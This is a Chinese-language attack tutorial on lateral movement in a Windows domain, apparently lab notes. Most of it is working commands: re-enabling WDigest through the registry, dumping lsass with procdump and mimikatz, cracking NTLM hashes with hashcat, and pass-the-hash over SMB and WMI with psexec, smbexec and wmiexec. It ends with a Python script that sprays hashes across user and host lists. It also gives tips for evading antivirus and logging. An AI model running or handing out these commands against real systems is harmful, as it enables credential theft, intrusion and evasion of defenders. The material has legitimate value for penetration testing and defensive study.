內網安全3-域橫向smb&wmi明文或hash傳遞

#知識點1：

Windows2012以上版本默認關閉wdigest,攻擊者無法從內存中獲取明文密碼

Windows2012以下版本如安裝KB2871997補丁，同樣也會導致無法獲取明文密碼

針對以上情況，我們提供了4種方式解決此類問題

1.利用哈希hash傳遞(pth，ptk等)進行移動

2.利用其它服務協議(SMB,WMI等)進行哈希移動

3.利用注冊表操作開啟Wdigest Auth值進行獲取

4.利用工具或第三方平台(Hachcat)進行破解獲取

 

#知識點2：

Windows系統LM Hash及NTLM Hash加密算法，個人系統在Windows vista后，服務器系統在Windows 2003以后，認證方式均為NTLM Hash。

 

#注冊表修改

reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f

 

hashcat -a 0 -m 1000 hash file --force //爆破哈希的軟件

 

1-Procdump+Mimikatz配合獲取 

procdump是微軟開發的所以不會被殺，如果mimikatz被殺的情況下可以用這個配合導出密碼

#procdump配合mimikatz

procdump -accepteula -ma lsass.exe lsass.dmp

mimikatz上執行：

sekurlsa::minidump lsass.dmp

sekurlsa::logonPasswords full

#Pwdump7

#QuarksPwdump

 

2-域橫向移動SMB服務利用-psexec,smbexec(官方自帶)

利用SMB服務可以通過明文或hash傳遞來遠程執行，條件445服務端口開放。

#psexec第一種：先有ipc鏈接，psexec需要明文或hash傳遞

net use \\192.168.3.32\ipc$ "admin!@#45" /user:ad

ministrator

psexec \\192.168.3.32 -s cmd # 需要先有ipc鏈接 -s以System權限運行

#psexec第二種：不用建立IPC直接提供明文賬戶密碼

psexec \\192.168.3.21 -u administrator -p Admin12345 -s cmd 

psexec -hashes :$HASH$ ./administrator@10.1.2.3

psexec -hashes :$HASH$ domain/administrator@10.1.2.3

psexec -hashes :518b98ad4178a53695dc997aa02d455c ./administrator@192.168.3.32 官方Pstools無法采用hash連接

#非官方自帶-參考impacket工具包使用，操作簡單，容易被殺

 

#smbexec無需先ipc鏈接 明文或hash傳遞

smbexec god/administrator:Admin12345@192.168.3.21

smbexec ./administrator:admin!@#45@192.168.3.32

smbexec -hashes :$HASH$ ./admin@192.168.3.21

smbbexec -hashes :$HASH$ domain/admin@192.168.3.21

smbexec -hashes :518b98ad4178a53695dc997aa02d455c ./administrator@192.168.3.32

smbexec -hashes :ccef208c6485269c20db2cad21734fe7 god/administrator@192.168.3.21

 

3-域橫向移動WMI服務利用-cscript,wmiexec,wmic

WMI(Windows Management Instrumentation) 是通過135端口進行利用，支持用戶名明文或者hash的方式進行認證，並且該方法不會在目標日志系統留下痕跡。

#自帶WMIC 明文傳遞 無回顯

wmic /node:192.168.3.21 /user:administrator /password:Admin12345 process call create "cmd.exe /c ipconfig >C:\1.txt"

#自帶cscript明文傳遞 有回顯

cscript //nologo wmiexec.vbs /shell 192.168.3.21 administrator Admin12345

#套件impacket wmiexec 明文或hash傳遞 有回顯exe版本

wmiexec ./administrator:admin!@#45@192.168.3.32 "whoami"

wmiexec god/administrator:Admin12345@192.168.3.21 "whoami"

wmiexec -hashes :518b98ad4178a53695dc997aa02d455c ./administrator@192.168.3.32 "whoami"

wmiexec -hashes :ccef208c6485269c20db2cad21734fe7 god/administrator@192.168.3.21 "whoami"

 

4-域橫向移動以上服務hash批量利用-python編譯exe

#pyinstaller.exe -F fuck_neiwang_002.py

import os,time

ips={

'192.168.3.21',

'192.168.3.25',

'192.168.3.29',

'192.168.3.30',

'192.168.3.32'

}

users={

'Administrator',

'boss',

'dbadmin',

'fileadmin',

'mack',

'mary',

'webadmin'

}

hashs={

'ccef208c6485269c20db2cad21734fe7',

'518b98ad4178a53695dc997aa02d455c'

}

 

for ip in ips:

for user in users:

for mimahash in hashs:

#wmiexec -hashes :hash god/user@ip whoami

exec = "wmiexec -hashes :"+mimahash+" god/"+user+"@"+ip+" whoami"

print('--->' + exec + '<---')

os.system(exec)

time.sleep(0.5)